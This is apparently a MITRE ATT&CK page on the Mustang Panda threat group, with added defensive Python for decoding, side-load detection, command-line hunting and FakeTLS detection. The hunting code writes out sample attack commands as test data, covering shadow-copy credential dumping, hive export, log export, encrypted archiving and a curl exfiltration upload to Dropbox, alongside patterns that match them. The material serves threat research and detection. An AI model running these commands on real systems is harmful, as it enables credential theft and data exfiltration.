Mustang Panda, TA416, RedDelta, BRONZE PRESIDENT, STATELY TAURUS, FIREANT, CAMARO DRAGON, EARTH PRETA, HIVE0154, TWILL TYPHOON, TANTALUM, LUMINOUS MOTH, UNC6384, TEMP.Hex, Red Lich, ClumsyToad, Group G0129

Enterprise

T1087

.002

Account Discovery: Domain Account

Mustang Panda has utilized AdFind to identify domain users.[20]

Enterprise

T1583

.001

Acquire Infrastructure: Domains

Mustang Panda has acquired C2 domains prior to operations.[5][21][34][15][25][30][17][10][35]

Mustang Panda registered adversary-controlled domains during RedDelta Modified PlugX Infection Chain Operations that were re-registrations of expired domains.[33]

.006

Acquire Infrastructure: Web Services

Mustang Panda has set up Dropbox and Google Drive to host malicious downloads.[23]

Enterprise

T1557

Adversary-in-the-Middle

Mustang Panda leveraged a captive portal hijack that redirected the victim to a webpage that prompted the victim to download a malicious payload.[30]

Enterprise

T1071

.001

Application Layer Protocol: Web Protocols

Mustang Panda has communicated with its C2 via HTTP POST requests.[3][5][15][17][35]

Mustang Panda used HTTP POST messages for command and control from PlugX installations during RedDelta Modified PlugX Infection Chain Operations.[33]

Enterprise

T1560

.001

Archive Collected Data: Archive via Utility

Mustang Panda has used RAR to create password-protected archives of collected documents prior to exfiltration.[5][36] Mustang Panda has used WinRAR "Rar.exe" to archive stolen files before exfiltration.[18] Mustang Panda has also used TONESHELL and post-exploitation tools such as RemCom and Impacket to execute WinRAR rar.exe to archive files for exfiltration.[20]

.003

Archive Collected Data: Archive via Custom Method

Mustang Panda has encrypted documents with RC4 prior to exfiltration.[36]

Enterprise

T1119

Automated Collection

Mustang Panda used custom batch scripts to collect files automatically from a targeted system.[5]

Enterprise

T1547

.001

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Mustang Panda has created the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\AdobelmdyU to maintain persistence.[14] Mustang Panda has also established persistence via the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run.[7][12]

Mustang Panda used Run registry keys with names such as OneNote Update to launch legitimate executables that in turn loaded malicious DLLs through search-order hijacking, ensuring persistence during RedDelta Modified PlugX Infection Chain Operations.[33]

Enterprise

T1059

Command and Scripting Interpreter

Mustang Panda has utilized Meterpreter shellcode.[4]

.001

PowerShell

Mustang Panda has used malicious PowerShell scripts to enable execution.[3][9][18]

Mustang Panda used LNK files to execute PowerShell commands leading to eventual PlugX installation during RedDelta Modified PlugX Infection Chain Operations.[33]

.003

Windows Command Shell

Mustang Panda has executed HTA files via cmd.exe, and used batch scripts for collection.[3][36] Mustang Panda has also utilized cmd.exe to execute commands on an infected host such as cmd.exe /c ping.exe 8.8.8.8 -n 70&&"%temp%\FontEDL.exe".[4]

.005

Visual Basic

Mustang Panda has embedded VBScript components in LNK files to download additional files and automate collection.[3][5][9] Mustang Panda has also used VBA macros in maldocs to execute malicious DLLs.[4] Mustang Panda also used a VBScript, "autorun.vbs", saved to the Startup directory so that it ran automatically at each user logon.[20]

.007

JavaScript

Mustang Panda has executed a JavaScript payload utilizing wscript.exe on the endpoint.[4]

Enterprise

T1586

.002

Compromise Accounts: Email Accounts

Mustang Panda has compromised legitimate email accounts to use in their spear-phishing operations.[23]

Enterprise

T1001

.003

Data Obfuscation: Protocol or Service Impersonation

Mustang Panda has utilized TLS record headers in network packets to impersonate various versions of TLS protocols to blend in with legitimate network traffic. Mustang Panda has used FakeTLS to communicate with its C2 servers.[13]

Enterprise

T1074

.001

Data Staged: Local Data Staging

Mustang Panda has stored collected credential files in c:\windows\temp prior to exfiltration. Mustang Panda has also stored documents for exfiltration in a hidden folder on USB drives.[5][36]

Enterprise

T1622

Debugger Evasion

Mustang Panda has embedded debug strings with messages to distract analysts.[23] Mustang Panda has also made calls to Windows API CheckRemoteDebuggerPresent and exits if it detects a debugger.[12]

Enterprise

T1678

Delay Execution

Mustang Panda has delayed the execution of payloads leveraging ping echo requests cmd /c ping 8.8.8.8 -n 70&&"%temp%\<legitimate executable>".[2][11] Because Windows ping sends one echo request roughly every second, -n 70 yields an approximately 70-second sleep without calling a sleep API, and the && ensures the payload runs only once the delay has completed.

Enterprise

T1140

Deobfuscate/Decode Files or Information

Mustang Panda has the ability to decrypt its payload prior to execution.[34][7][10][12] Mustang Panda has also utilized RC4 encryption for malicious payloads.[30][17]

Enterprise

T1587

.001

Develop Capabilities: Malware

Mustang Panda has developed custom malware for use in their operations.[2][4]

Enterprise

T1573

.001

Encrypted Channel: Symmetric Cryptography

Mustang Panda has encrypted C2 communications with RC4.[2][15] Mustang Panda has also leveraged encryption and compression algorithms to obfuscate the traffic between the system and C2 server; the methods observed included RC4, AES, XOR with 0x5a, and LZO.[17]
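The RC4 and single-byte XOR layers named above (and the RC4-encrypted payloads described under Deobfuscate/Decode Files or Information) are cheap to strip once the key is known. The block below is an added example for analysts, not code from the page or from any vendor report: a self-contained RC4, the 0x5a XOR, a helper that unwinds a stack of layers in reverse order, and a candidate-key search that exploits the fact that RC4 is a stream cipher, so only the first bytes need decrypting to test for an MZ header. The key "c0nfig" and the encrypted blobs used in the check are constructed; the RC4 test vectors are the standard published ones.

```python
"""RC4 / XOR-0x5a decoding helpers for captured C2 traffic or payload blobs.

Added example; not code from the page or any vendor report. Keys and blobs used
for the self-check are constructed.
"""


def rc4(key: bytes, data: bytes) -> bytes:
    """Apply the RC4 keystream to data. Encryption and decryption are the same op."""
    if not key:
        raise ValueError("RC4 key must be non-empty")
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm (KSA)
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # pseudo-random generation algorithm (PRGA)
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor_5a(data: bytes) -> bytes:
    """Single-byte XOR with 0x5a, one of the layers the page reports."""
    return bytes(b ^ 0x5A for b in data)


def decode_layers(blob: bytes, key: bytes, layers) -> bytes:
    """Undo a stack of encodings. `layers` lists the steps in the order the
    implant applied them (e.g. ["rc4", "xor5a"]); decoding walks them backwards."""
    ops = {"rc4": lambda d: rc4(key, d), "xor5a": xor_5a}
    for name in reversed(list(layers)):
        blob = ops[name](blob)
    return blob


def find_rc4_key(blob: bytes, candidates, expect: bytes = b"MZ"):
    """Return the first candidate key whose RC4 output starts with `expect`
    (an MZ header when the blob should be a PE), or None. Because RC4 is a
    stream cipher, decrypting only len(expect) bytes per candidate is enough."""
    for key in candidates:
        if rc4(key, blob[:len(expect)]) == expect:
            return key
    return None


if __name__ == "__main__":
    # Constructed sample: a fake PE prefix wrapped as RC4 then XOR 0x5a.
    pe = b"MZ\x90\x00" + bytes(range(60))
    blob = xor_5a(rc4(b"c0nfig", pe))
    print(decode_layers(blob, b"c0nfig", ["rc4", "xor5a"]) == pe)
    print(find_rc4_key(rc4(b"c0nfig", pe), [b"wrong", b"c0nfig"]))
```

When the key is not known, the same prefix trick lets you test hard-coded strings pulled from the loader binary against the encrypted blob in bulk rather than decrypting the whole file for each guess.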

Enterprise

T1585

.002

Establish Accounts: Email Accounts

Mustang Panda has leveraged the legitimate email marketing service SMTP2Go for phishing campaigns.[16] Mustang Panda has also created fake Google accounts to distribute malware via spear-phishing emails.[23] Mustang Panda has also created accounts for spearphishing operations including the use of services such as Proton Mail.[27][28]

Enterprise

T1546

.003

Event Triggered Execution: Windows Management Instrumentation Event Subscription

Mustang Panda's custom ORat tool uses a WMI event consumer to maintain persistence.[5]

Enterprise

T1480

Execution Guardrails

Mustang Panda included the use of Cloudflare geofencing mechanisms to limit payload download activity during RedDelta Modified PlugX Infection Chain Operations.[33]

Enterprise

T1048

.003

Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol

Mustang Panda has used FTP to exfiltrate archive files.[20]

Enterprise

T1041

Exfiltration Over C2 Channel

Mustang Panda has exfiltrated stolen data and files to its C2 server.[4][7][11]

Enterprise

T1052

.001

Exfiltration Over Physical Medium: Exfiltration over USB

Mustang Panda has used a customized PlugX variant which could exfiltrate documents from air-gapped networks.[36]

Enterprise

T1567

.002

Exfiltration Over Web Service: Exfiltration to Cloud Storage

Mustang Panda has also exfiltrated archived files to cloud services such as Dropbox using curl.[20][18]

Enterprise

T1203

Exploitation for Client Execution

Mustang Panda has exploited CVE-2017-0199 in Microsoft Word to execute code.[9]

Mustang Panda used the GrimResource exploitation technique via specially crafted MSC files for arbitrary code execution during RedDelta Modified PlugX Infection Chain Operations.[33]

Enterprise

T1083

File and Directory Discovery

Mustang Panda has searched the entire target system for DOC, DOCX, PPT, PPTX, XLS, XLSX, and PDF files.[36][20]

Enterprise

T1564

.001

Hide Artifacts: Hidden Files and Directories

Mustang Panda's PlugX variant has created a hidden folder on USB drives named RECYCLE.BIN to store malicious executables and collected data.[36] Mustang Panda has also modified file attributes to hidden and system.[2]

Mustang Panda stored encrypted payloads associated with PlugX installation in hidden directories during RedDelta Modified PlugX Infection Chain Operations.[33]

Enterprise

T1574

.001

Hijack Execution Flow: DLL

Mustang Panda has used a legitimately signed executable to execute a malicious payload within a DLL file.[2][3][4][19][7][15][20][25][23][14][17][11][37][13] Mustang Panda has abused legitimate executables to side-load malicious DLLs.[21][34][27][28][30]

Mustang Panda used DLL search order hijacking on vulnerable applications to install PlugX payloads during RedDelta Modified PlugX Infection Chain Operations.[33]
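The side-loading pattern described in these two entries (a validly signed host executable, often dropped under a user-writable path, that loads an attacker-supplied DLL from its own directory) is detectable from image-load telemetry. The block below is an added example, not code from the page or from any vendor tool. It works over constructed, normalised records: Sysmon ImageLoad (Event ID 7) supplies the loaded DLL's Signed and SignatureStatus fields, and the signature status of the process image is assumed to come from an EDR or a separate Authenticode check, since Event 7 describes only the loaded module. The field names process_image, process_sig_status, dll, dll_signed and dll_sig_status, the paths, and the DLL names are assumptions for the example; inkform.exe is named on the page, the helper.dll paired with it here is not.

```python
"""Find DLL side-loading candidates in normalised image-load records.

Added example, not from the page or any vendor tool. Records are constructed
dicts joining Sysmon Event 7 fields for the DLL with an externally obtained
signature status for the process image.
"""
import ntpath

TRUSTED_ROOTS = (r"c:\windows", r"c:\program files", r"c:\program files (x86)")


def under_trusted_root(directory: str) -> bool:
    """True when the directory is one a vendor-installed binary normally lives in."""
    d = directory.lower().rstrip("\\")
    return any(d == root or d.startswith(root + "\\") for root in TRUSTED_ROOTS)


def dll_validly_signed(rec: dict) -> bool:
    return bool(rec.get("dll_signed")) and rec.get("dll_sig_status") == "Valid"


def sideload_candidates(records):
    """One hit per record where a validly signed process loaded an unsigned (or
    badly signed) DLL from its own directory. Severity is high when that
    directory is outside the trusted roots (drop locations like %APPDATA% or
    %TEMP%), medium when a vendor directory is involved."""
    hits = []
    for rec in records:
        exe_dir = ntpath.dirname(rec["process_image"]).lower()
        dll_dir = ntpath.dirname(rec["dll"]).lower()
        if dll_dir != exe_dir:
            continue                    # side-loading needs the DLL beside the host EXE
        if rec.get("process_sig_status") != "Valid" or dll_validly_signed(rec):
            continue                    # the lure is a trusted signed host plus an untrusted DLL
        hits.append({
            "severity": "medium" if under_trusted_root(exe_dir) else "high",
            "process": rec["process_image"],
            "dll": rec["dll"],
        })
    return hits


# Constructed records (not real telemetry) covering the cases the rule must separate.
SAMPLE_RECORDS = [
    {   # signed host EXE dropped under %APPDATA% beside an unsigned DLL: classic side-load
        "process_image": r"C:\Users\ann\AppData\Roaming\InkForm\inkform.exe",
        "process_sig_status": "Valid",
        "dll": r"C:\Users\ann\AppData\Roaming\InkForm\helper.dll",
        "dll_signed": False, "dll_sig_status": "Unavailable",
    },
    {   # signed vendor app loading an unsigned DLL from its install directory: worth a look
        "process_image": r"C:\Program Files\ExampleVendor\app.exe",
        "process_sig_status": "Valid",
        "dll": r"C:\Program Files\ExampleVendor\plugin.dll",
        "dll_signed": False, "dll_sig_status": "Unavailable",
    },
    {   # normal system load, both images signed
        "process_image": r"C:\Windows\System32\svchost.exe",
        "process_sig_status": "Valid",
        "dll": r"C:\Windows\System32\ntdll.dll",
        "dll_signed": True, "dll_sig_status": "Valid",
    },
    {   # unsigned tool loading an unsigned DLL: suspicious, but not the signed-host lure
        "process_image": r"C:\Users\ann\Downloads\tool.exe",
        "process_sig_status": "Unavailable",
        "dll": r"C:\Users\ann\Downloads\tool.dll",
        "dll_signed": False, "dll_sig_status": "Unavailable",
    },
    {   # DLL resolved from System32, not the EXE's own directory: not a side-load
        "process_image": r"C:\Users\ann\AppData\Local\Temp\FontEDL.exe",
        "process_sig_status": "Valid",
        "dll": r"C:\Windows\System32\kernel32.dll",
        "dll_signed": True, "dll_sig_status": "Valid",
    },
]

if __name__ == "__main__":
    for hit in sideload_candidates(SAMPLE_RECORDS):
        print(hit["severity"], hit["process"], "->", hit["dll"])
```

The medium-severity class is noisy in environments with many unsigned vendor plugins; the high-severity class (signed EXE outside a trusted root loading an unsigned DLL beside it) is rare enough in most fleets to triage directly.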

.005

Hijack Execution Flow: Executable Installer File Permissions Weakness

Mustang Panda has leveraged legitimate software installer executables such as Setup Factory "IRSetup.exe" to drop and execute their payload.[25]

Enterprise

T1070

Indicator Removal

Mustang Panda has deleted registry keys that it used to store data and maintain persistence.[2]

.004

File Deletion

Mustang Panda will delete their tools and files, and kill processes after their objectives are reached.[5][37]

.006

Timestomp

Mustang Panda has modified file timestamps from the export address table (EAT) in malware to make it difficult to identify creation times.[10]

Enterprise

T1105

Ingress Tool Transfer

Mustang Panda has downloaded additional executables following the initial infection stage.[2][4][15][11] Mustang Panda has also leveraged Visual Studio Code code.exe and Dev Tunnels using DevTunnel.exe to propagate additional tools and payloads.[18]

Enterprise

T1654

Log Enumeration

Mustang Panda has used Wevtutil to gather Windows Security Event Logs.[20]

Enterprise

T1036

.004

Masquerading: Masquerade Task or Service

Mustang Panda masqueraded Registry run keys as legitimate-looking service names such as OneNote Update during RedDelta Modified PlugX Infection Chain Operations.[33]

.005

Masquerading: Match Legitimate Resource Name or Location

Mustang Panda has used names like adobeupdate.dat and PotPlayerDB.dat to disguise PlugX, and a file named OneDrive.exe to load a Cobalt Strike payload.[15] Mustang Panda has also masqueraded legitimate browser plugin updates to include AdobePlugins.exe.[30]

.007

Masquerading: Double File Extension

Mustang Panda has used an additional filename extension to hide the true file type.[9][3]

.008

Masquerading: Masquerade File Type

Mustang Panda has masqueraded malicious executables as legitimate files that download PlugX malware.[7][11]

Enterprise

T1106

Native API

Mustang Panda has used various Windows API calls during execution and defense evasion.[2][19][34][27][28][25][23][30][10][12][37][13]

Enterprise

T1046

Network Service Discovery

Mustang Panda has leveraged NBTscan to scan IP networks.[20]

Enterprise

T1095

Non-Application Layer Protocol

Mustang Panda has utilized TCP-based reverse shells using cmd.exe.[4]

Mustang Panda communicated over TCP 5000 from adversary administrative servers to adversary command and control nodes during RedDelta Modified PlugX Infection Chain Operations.[33]

Enterprise

T1027

Obfuscated Files or Information

Mustang Panda has delivered initial payloads hidden using archives and encoding measures.[3][4][5][15][9][23][14][16][17][11][37][13] Mustang Panda has also utilized opaque predicates in payloads to hinder analysis.[2]

.007

Dynamic API Resolution

Mustang Panda has leveraged obfuscated Windows API function calls that were concealed as unique names, or hashes of the Windows API.[2]

.012

LNK Icon Smuggling

Mustang Panda has utilized LNK files to hide malicious scripts for execution.[4][12] Mustang Panda has also leveraged LNK files that were programmed to display a PDF icon to entice the victim to click on the file to execute an office.exe binary.[21]

.013

Encrypted/Encoded File

Mustang Panda stored installation payloads as encrypted files in hidden folders during RedDelta Modified PlugX Infection Chain Operations.[33]

.016

Junk Code Insertion

Mustang Panda has used junk code within their DLL files to hinder analysis.[2][36]

Enterprise

T1588

.002

Obtain Capabilities: Tool

Mustang Panda has obtained and leveraged publicly-available tools for intrusion activities.[4][20]

.003

Obtain Capabilities: Code Signing Certificates

Mustang Panda has used revoked code signing certificates for its malicious payloads.[37]

.004

Obtain Capabilities: Digital Certificates

Mustang Panda has obtained SSL certificates for their C2 domains.[7][30]

Mustang Panda acquired Cloudflare Origin CA TLS certificates during RedDelta Modified PlugX Infection Chain Operations.[33]

Enterprise

T1003

OS Credential Dumping

Mustang Panda utilized "Hdump" to dump credentials from memory.[20]

.001

LSASS Memory

Mustang Panda has harvested credentials from the memory of lsass.exe with Mimikatz.[20]

.003

NTDS

Mustang Panda has used vssadmin to create a volume shadow copy and retrieve the NTDS.dit file. Mustang Panda has also used reg save on the SYSTEM file Registry location to help extract the NTDS.dit file.[5][20]

.006

DCSync

Mustang Panda has leveraged Mimikatz DCSync feature to obtain user credentials.[20]

Enterprise

T1069

.002

Permission Groups Discovery: Domain Groups

Mustang Panda has leveraged AdFind to enumerate domain groups.[20]

Enterprise

T1566

.001

Phishing: Spearphishing Attachment

Mustang Panda has used spearphishing attachments to deliver initial access payloads.[4][21][34][27][28][38][15][24][14] Mustang Panda has also delivered archive files such as RAR and ZIP files containing legitimate EXEs and malicious DLLs.[34][27][28]

Mustang Panda leveraged malicious attachments in spearphishing emails for initial access to victim environments in RedDelta Modified PlugX Infection Chain Operations.[33]

.002

Phishing: Spearphishing Link

Mustang Panda has delivered malicious links to their intended targets.[27][28][35] Mustang Panda has distributed spear-phishing emails with embedded links that direct the victim to a malicious archive hosted on Google or Dropbox.[23]

Mustang Panda distributed malicious links in phishing emails leading to HTML files that would direct the victim to malicious MSC files if running Windows based on User Agent fingerprinting during RedDelta Modified PlugX Infection Chain Operations.[33]

Enterprise

T1598

.003

Phishing for Information: Spearphishing Link

Mustang Panda has delivered web bugs to profile their intended targets.[16]

Enterprise

T1057

Process Discovery

Mustang Panda has used tasklist /v to determine active process information.[36] Mustang Panda has also used TONESHELL malware to check the process name and process path to ensure it matches the expected one prior to triggering a custom exception handler.[23]

Enterprise

T1572

Protocol Tunneling

Mustang Panda has leveraged OpenSSH (sshd.exe) to execute commands, transfer files and spread across the environment communicating over SMB port 445.[18]

Enterprise

T1090

Proxy

Mustang Panda proxied communication through the Cloudflare CDN service during RedDelta Modified PlugX Infection Chain Operations.[33]

Enterprise

T1219

.001

Remote Access Tools: IDE Tunneling

Mustang Panda has utilized an established GitHub account to create a tunnel within the victim environment using Visual Studio Code through the code.exe tunnel command.[18]
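Several entries on this page quote or describe command lines that are distinctive enough to hunt for in process-creation telemetry: the ping -n 70 && delay chain (Windows Command Shell, Delay Execution), vssadmin shadow copies and reg save of the SYSTEM hive (OS Credential Dumping: NTDS), wevtutil export of the Security log (Log Enumeration), rar.exe password-protected archives (Archive via Utility), curl uploads to Dropbox (Exfiltration to Cloud Storage), and code.exe tunnel (IDE Tunneling). The block below is an added example, not code from the page or any vendor rule set: a small regex rule set run over constructed command lines. Only the ping chain mirrors a string quoted on the page; the other sample lines are plausible invocations of the named tools and are assumptions, as are the rule names. The reg save rule is broadened beyond the page's SYSTEM hive to SAM and SECURITY, which the same dumping workflow commonly targets.

```python
"""Hunt over process command lines for tradecraft described on this page.

Added example, not from the page or any vendor rule set. SAMPLE_COMMANDS is
constructed; treat every path, flag and host name in it as illustrative.
"""
import re

RULES = {
    # ping used as a sleep, chained to the real payload with &&
    "ping_delay_then_exec": re.compile(r'\bping(?:\.exe)?\b[^&]*-n\s+\d{2,}[^&]*&&', re.I),
    # shadow copy creation, the usual precursor to copying NTDS.dit
    "vss_shadow_copy": re.compile(r'\bvssadmin(?:\.exe)?\s+create\s+shadow\b', re.I),
    # hive export needed to decrypt NTDS.dit / SAM secrets
    "reg_save_hive": re.compile(r'\breg(?:\.exe)?\s+save\s+"?hklm\\(?:system|sam|security)\b', re.I),
    # Security log export or query
    "security_log_export": re.compile(r'\bwevtutil(?:\.exe)?\s+(?:qe|epl)\s+security\b', re.I),
    # rar "add" with -p / -hp (password / password + encrypted headers)
    "rar_password_archive": re.compile(r'\brar(?:\.exe)?"?\s+a\b.*?\s-(?:hp|p)\S', re.I),
    # curl talking to the Dropbox API
    "curl_dropbox_upload": re.compile(r'\bcurl(?:\.exe)?\b.*dropboxapi\.com', re.I),
    # VS Code remote tunnel
    "vscode_tunnel": re.compile(r'\bcode(?:\.exe)?"?\s+tunnel\b', re.I),
}


def match_commands(lines):
    """Return [(line_number, rule_name)] for every rule each command line triggers."""
    hits = []
    for n, line in enumerate(lines, 1):
        for name, rx in RULES.items():
            if rx.search(line):
                hits.append((n, name))
    return hits


# Constructed command lines: seven that should fire, two that should not.
SAMPLE_COMMANDS = [
    r'cmd.exe /c ping.exe 8.8.8.8 -n 70&&"C:\Users\ann\AppData\Local\Temp\FontEDL.exe"',
    r'vssadmin create shadow /for=C:',
    r'reg save HKLM\SYSTEM C:\Windows\Temp\sys.hiv',
    r'wevtutil qe Security /f:text',
    r'"C:\Program Files\WinRAR\Rar.exe" a -hpS3cret! C:\Windows\Temp\docs.rar C:\Users\ann\Documents\*.docx',
    r'curl.exe -X POST https://content.dropboxapi.com/2/files/upload --data-binary @C:\Windows\Temp\docs.rar',
    r'code.exe tunnel',
    r'ping 8.8.8.8 -n 4',
    r'notepad.exe C:\Users\ann\notes.txt',
]

if __name__ == "__main__":
    for line_no, rule in match_commands(SAMPLE_COMMANDS):
        print(f"line {line_no}: {rule}")
```

The ping rule deliberately requires a two-digit echo count and a trailing &&: a short connectivity check is benign, a long one that gates execution of something else is the behaviour worth a ticket.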

.002

Remote Access Tools: Remote Desktop Software

Mustang Panda has installed TeamViewer on targeted systems.[5]

Enterprise

T1018

Remote System Discovery

Mustang Panda has queried Active Directory for computers using AdFind.[20] Mustang Panda has also utilized SharpNBTScan to scan the victim environment.[18]

Enterprise

T1091

Replication Through Removable Media

Mustang Panda has used a customized PlugX variant which could spread through USB connections.[36]

Enterprise

T1053

.005

Scheduled Task/Job: Scheduled Task

Mustang Panda has created a scheduled task to execute additional malicious software, as well as maintain persistence.[3][4][5][35] Mustang Panda has also created a scheduled task that creates a reverse shell.[18]

Enterprise

T1593

Search Open Websites/Domains

Mustang Panda has used open-source research to identify information about victims to use in targeting to include creating weaponized phishing lures and attachments.[27][28]

Enterprise

T1505

.003

Server Software Component: Web Shell

Mustang Panda has used China Chopper web shells to maintain access to victims’ environments.[20]

Enterprise

T1129

Shared Modules

Mustang Panda has leveraged LoadLibrary to load DLLs.[2]

Enterprise

T1072

Software Deployment Tools

Mustang Panda has leveraged legitimate software tools such as antivirus agents, security services, and app development tools to execute scripts and to side-load DLLs.[20][25]

Enterprise

T1518

Software Discovery

Mustang Panda has searched the victim system for the InstallUtil.exe program and its version.[3]

Enterprise

T1176

.002

Software Extensions: IDE Extensions

Mustang Panda has leveraged Visual Studio Code’s (VSCode) embedded reverse shell feature using the command code.exe tunnel to execute code and deliver additional payloads.[18]

Enterprise

T1608

Stage Capabilities

Mustang Panda has used servers under their control to validate tracking pixels sent to phishing victims.[16]

.001

Upload Malware

Mustang Panda has hosted malicious payloads on DropBox including PlugX.[16]

Mustang Panda staged malware on adversary-controlled domains and cloud storage instances during RedDelta Modified PlugX Infection Chain Operations.[33]

Enterprise

T1553

.002

Subvert Trust Controls: Code Signing

Mustang Panda has used valid legitimate digital signatures and certificates to evade detection.[21][34][30][17][10][11][37][13]

Mustang Panda used legitimate, signed binaries such as inkform.exe or ExcelRepairToolboxLauncher.exe for follow-on execution of malicious DLLs through DLL search order hijacking in RedDelta Modified PlugX Infection Chain Operations.[33]

Enterprise

T1218

.004

System Binary Proxy Execution: InstallUtil

Mustang Panda has used InstallUtil.exe to execute a malicious Beacon stager.[3]

.005

System Binary Proxy Execution: Mshta

Mustang Panda has used mshta.exe to launch collection scripts.[5]

.007

System Binary Proxy Execution: Msiexec

Mustang Panda initial payloads downloaded a Windows Installer MSI file that in turn dropped follow-on files leading to installation of PlugX during RedDelta Modified PlugX Infection Chain Operations.[33]

.014

System Binary Proxy Execution: MMC

Mustang Panda used Microsoft Management Console Snap-In Control files, or MSC files, executed via MMC to run follow-on PowerShell commands during RedDelta Modified PlugX Infection Chain Operations.[33]

Enterprise

T1082

System Information Discovery

Mustang Panda has gathered system information using systeminfo.[36]

Mustang Panda captured victim operating system type via User Agent analysis during RedDelta Modified PlugX Infection Chain Operations.[33]

Enterprise

T1016

System Network Configuration Discovery

Mustang Panda has used ipconfig and arp to determine network configuration information.[36] Mustang Panda has also utilized SharpNBTScan to scan the victim environment.[18]

Enterprise

T1049

System Network Connections Discovery

Mustang Panda has used netstat -ano to determine network connection information.[36]

Enterprise

T1205

Traffic Signaling

Mustang Panda has utilized a magic value in C2 communications and only executes in memory when response packets match specific values of "17 03 03" or "46 77 4d".[21]
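The FakeTLS behaviour described under Data Obfuscation: Protocol or Service Impersonation and the magic values here are two sides of the same design: the implant wraps its traffic in TLS-looking record headers, and it acts only on responses that begin with either 17 03 03 (which is also a genuine TLS 1.2 application_data header) or 46 77 4d (which is not a TLS content type at all). The block below is an added example, not code from the page or any vendor report, showing how a flow-level check separates the two. A 46 77 4d prefix is flagged outright; a 17 03 03 record is only suspicious when the flow never carried a ClientHello, because real TLS cannot produce application data before a handshake. The packet bytes in SAMPLE_FLOWS are constructed and reduced to the records the check needs; only the two prefixes come from the page.

```python
"""Flag FakeTLS-style C2 and implant magic prefixes at the flow level.

Added example; not code from the page or any vendor report. SAMPLE_FLOWS is
constructed: only the 17 03 03 and 46 77 4d prefixes come from the page.
"""

TLS_HANDSHAKE, TLS_APP_DATA = 0x16, 0x17
KNOWN_RECORD_TYPES = {0x14, 0x15, 0x16, 0x17}          # CCS, alert, handshake, app data
PLAUSIBLE_VERSIONS = {0x0301, 0x0302, 0x0303, 0x0304}   # record-layer versions TLS 1.0-1.3
MAGIC_FWM = bytes.fromhex("46774d")                      # "FwM": never a valid TLS record type


def parse_record(buf: bytes):
    """Return (content_type, version, payload) for one TLS-looking record, or
    None when the 5-byte header is short or the declared length exceeds the data."""
    if len(buf) < 5:
        return None
    ctype = buf[0]
    version = int.from_bytes(buf[1:3], "big")
    length = int.from_bytes(buf[3:5], "big")
    if len(buf) - 5 < length:
        return None
    return ctype, version, buf[5:5 + length]


def analyze_flow(packets) -> list:
    """packets: iterable of (direction, bytes), direction "c2s" or "s2c".
    Returns findings as strings (empty list = nothing odd). Checks:
      1. a server response starting with the 46 77 4d magic,
      2. a malformed record header, implausible version, or unknown record type,
      3. an application_data record on a flow that never carried a ClientHello
         (FakeTLS skips the handshake; real TLS cannot reach that state)."""
    findings = []
    saw_client_hello = False
    for direction, data in packets:
        if direction == "s2c" and data.startswith(MAGIC_FWM):
            findings.append("s2c: response begins with implant magic 46774d")
            continue
        rec = parse_record(data)
        if rec is None:
            findings.append(f"{direction}: malformed record header or declared length exceeds data")
            continue
        ctype, version, payload = rec
        if version not in PLAUSIBLE_VERSIONS:
            findings.append(f"{direction}: implausible record version {version:#06x}")
        if ctype not in KNOWN_RECORD_TYPES:
            findings.append(f"{direction}: unknown record type {ctype:#04x}")
        elif ctype == TLS_HANDSHAKE and payload[:1] == b"\x01":   # handshake type 1 = ClientHello
            saw_client_hello = True
        elif ctype == TLS_APP_DATA and not saw_client_hello:
            findings.append(f"{direction}: application_data before any ClientHello (FakeTLS pattern)")
    return findings


# Constructed flows (not captures): a minimal legitimate-looking exchange and
# three variants that show each finding.
SAMPLE_FLOWS = {
    "legit": [("c2s", bytes.fromhex("1603010005" "0100000100")),   # ClientHello stub
              ("s2c", bytes.fromhex("1703030003" "aabbcc"))],      # app data after handshake
    "faketls": [("s2c", bytes.fromhex("1703030004" "deadbeef"))],  # app data, no handshake
    "magic": [("s2c", bytes.fromhex("46774d0102"))],               # FwM prefix
    "truncated": [("c2s", bytes.fromhex("1703030010" "aa"))],      # claims 16 bytes, has 1
}

if __name__ == "__main__":
    for name, flow in SAMPLE_FLOWS.items():
        print(name, analyze_flow(flow) or "clean")
```

In a real sensor the ClientHello state has to be kept per 5-tuple across packets, and the "no handshake" rule should only be applied once the flow's first packets have been seen, so that mid-stream captures do not produce false positives.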

Enterprise

T1204

.001

User Execution: Malicious Link

Mustang Panda has sent malicious links including links directing victims to a Google Drive folder.[27][28][9][23][16][35] Mustang Panda has also utilized webpages with Javascript code that downloads malicious payloads to the victim device.[30]

Mustang Panda distributed hyperlinks that would result in an MSC file running a PowerShell command to download and install a remotely-hosted MSI file during RedDelta Modified PlugX Infection Chain Operations.[33]

.002

User Execution: Malicious File

Mustang Panda has sent malicious files requiring direct victim interaction to execute.[3][21][27][28][36][38][15][9][16][37] Mustang Panda has also leveraged executable files that display decoy documents to the victim to give an appearance of legitimacy, with customized themes related to the victim.[2][4][34][7][24][25][23][17][10][11][12]

Mustang Panda distributed malicious LNK objects for user execution during RedDelta Modified PlugX Infection Chain Operations.[33]

Enterprise

T1102

Web Service

Mustang Panda has used DropBox URLs to deliver variants of PlugX.[16] Mustang Panda has also used Google Drive to host malicious downloads.[27]

Enterprise

T1047

Windows Management Instrumentation

Mustang Panda has executed PowerShell scripts via WMI.[3][5]